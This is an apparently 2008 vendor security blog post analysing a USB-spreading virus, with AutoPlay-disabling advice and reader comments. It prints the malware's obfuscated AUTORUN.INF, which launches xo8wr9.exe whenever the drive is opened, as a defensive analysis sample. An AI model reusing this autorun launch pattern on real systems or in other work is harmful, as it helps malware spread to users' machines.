View my documents ()
 Home > Insights 

This Blog

Syndication

Tags

Calendar

<February 2008>
SunMonTueWedThuFriSat
272829303112
3456789
10111213141516
17181920212223
2425262728291
2345678

CA Security Advisor Research Blog

Find out what our research team is saying about the latest security threats in the CA Security Advisor blog

USB drives infected? A quick analysis

by Rossano Ferraris

 

Interestingly the new year 2008 opened its doors with a surprising news in the malware field.

Hardware infected? Yes, again malware guys have showed their extraordinary fantasy to

spread panic and disasters over the computer world.

 

According to recent reports by SANS Internet Storm Center there is a new trend to transmit

malwares through hardware vehicles like USB ports.

As you know USB port is a very powerful channel used to transfer information-data between

our PC and an external device. Look at –for example- memory sticks, SD cards for digital

camera, GPS devices and external hard drives.

So every device plugged into your PC through a USB port is considered a hard drive,

and every device considered a hard drive by your PC can be infected by a compromising malware.

 

To explain better what happens from the technical point of view I would like to show you some

details regarding a sample malware I received from one of our customers who stated that his

computer machine had been compromised after plugging a USB flash card.

 

The malicious architecture of the malware

 

The malware (a virus) copies itself to every hard drive internal and external altering the AUTORUN.INF

file which (in this incident) appears so:

 

[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll

 

The malware (xo8wr9.exe) is launched every time you open your drive:

 

 

 

It just not only copies itself to other drives, but according to this incident-analysis I found out it

also drops other malwares into your PC starting a hidden connection with a Chinese remote malicious

server.

 

CA users and customers are protected from these malwares through detection by our CA anti-malware

solutions (CA Anti-Virus and CA Anti-Spyware), but as assistance in preventing future incidents

I prefer to provide you some recommendations:

 

  • Regularly update your anti-malware solutions to the latest signature
  • Possibly disable the Windows AutoPlay feature
    • Start menu > Run and type “gpedit.msc”
    • Select Administrative Templates > System
    • On the right side pane you see an item called “Turn off Autoplay”
    • Double click the item, and set the radio button to Enabled
    • Change the "Turn off Autoplay on" to All Drives
  • Scan your external USB device with autoplay disabled before browsing it

 

 

Share this post: Email it! | bookmark it! | digg it! | reddit!
Published Feb 04 2008, 01:48 PM by Rossano Ferraris
Tags: , , , , , ,

Comments

Lani Refiti said:

Very good tip to turn off autoplay.  Simple yet can be very effective.  Going further I've seen some businesses disable the USB ports on their users desktops and even using Data Leak Prevention software to disable it and using policy, can pick and choose which users to enable it for.

February 4, 2008 7:32 PM

Rossano Ferraris said:

GPEDIT.MSC (Group Policy Editor) isn't available on XP Home Edition, partly because XP Home cannot join a domain by design. Although the took is designed to be used in an Enterprise environment running Active Directory, all it really does is making registry entries. So, the best alternative is to edit the registry using Regedit. Be aware that editing the registry incorrectly can make your system unbootable or cause other issues, so proceed carefully before diving in!

February 10, 2008 7:56 AM

USB memory stick said:

"So every device plugged into your PC through a USB port is considered a hard drive, and every device considered a hard drive by your PC can be infected by a compromising malware"

Oh no, my webcamz and keyboardz are infected!!!1one!

May 28, 2008 4:37 AM

Leave a Comment

(required)  
(optional)
(required)  
Add

About Rossano Ferraris

Rossano Ferraris is located in Italy where he lives and works for the CA Anti-Spyware Research Team as a research engineer. He was one of the first employees of PestPatrol and has been working for CA since its acquisition.

 

At CA he has taken the worldwide responsibility for supporting the CA Anti-Spyware product family as a senior specialist engineer, where he has trained the CA Threat Support Team on spyware issues. His main interests include spyware research, phishing, exploits and potentially unwanted software falling within CA Anti-Spyware’s scope of detection.

 

Rossano is an active member of various well known security forums and a member of ISSA association. He is the author of many articles on security matters for Italian newspapers and magazines and he is also author of a book on the spyware phenomenon published in Italy. He holds a degree in Computer Science and he is a GREM certified.
 
 
Page Tools